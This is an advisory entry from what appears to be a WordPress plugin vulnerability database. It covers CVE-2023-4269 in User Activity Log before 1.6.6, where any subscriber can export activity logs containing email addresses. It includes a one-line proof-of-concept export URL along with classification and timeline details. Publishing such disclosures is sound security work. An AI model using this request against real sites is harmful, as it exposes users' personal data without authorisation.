WordPress Plugin Vulnerabilities

User Activity Log < 1.6.6 - Subscriber+ Log Export

Description

The plugin lacks proper authorisation when exporting its activity logs, allowing any authenticated users, such as subscriber to perform such action and retrieve PII such as email addresses.

Proof of Concept

As a subscriber, open the following URL

https://example.com/wp-admin/admin-post.php?page=user_action_log&export=user_logs&logformat=csv&userrole&dateshow&username&type&showip&txtsearch&export-nonce=aaa

Affects Plugins

Plugin icon
user-activity-log
Fixed in 1.6.6

References

CVE
CVE-2023-4269

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://magos-securitas.com
Verified
Yes
WPVDB ID
db3e4336-117c-47f2-9b43-2ca115525297

Timeline

Publicly Published
2023-08-09 (about 9 months ago)
Added
2023-08-09 (about 9 months ago)
Last Updated
2023-08-09 (about 9 months ago)

Other

Published
Title
Published
2023-10-05
Title
Profile Extra Fields by BestWebSoft < 1.2.8 - Unauthenticated Sensitive Data Disclosure
Published
2023-11-08
Title
Elementor Website Builder < 3.16.5 - Missing Authorization to Arbitrary Attachment Read
Published
2023-03-06
Title
Gallery Blocks with Lightbox < 3.0.8 - Subscriber+ Arbitrary Options Update
Published
2024-04-25
Title
WooCommerce Amazon Affiliates - Wordpress Plugin <= 14.0.10 - Missing Authorization
Published
2023-11-14
Title
Thrive Theme Builder < 3.24.0 - Missing Authorization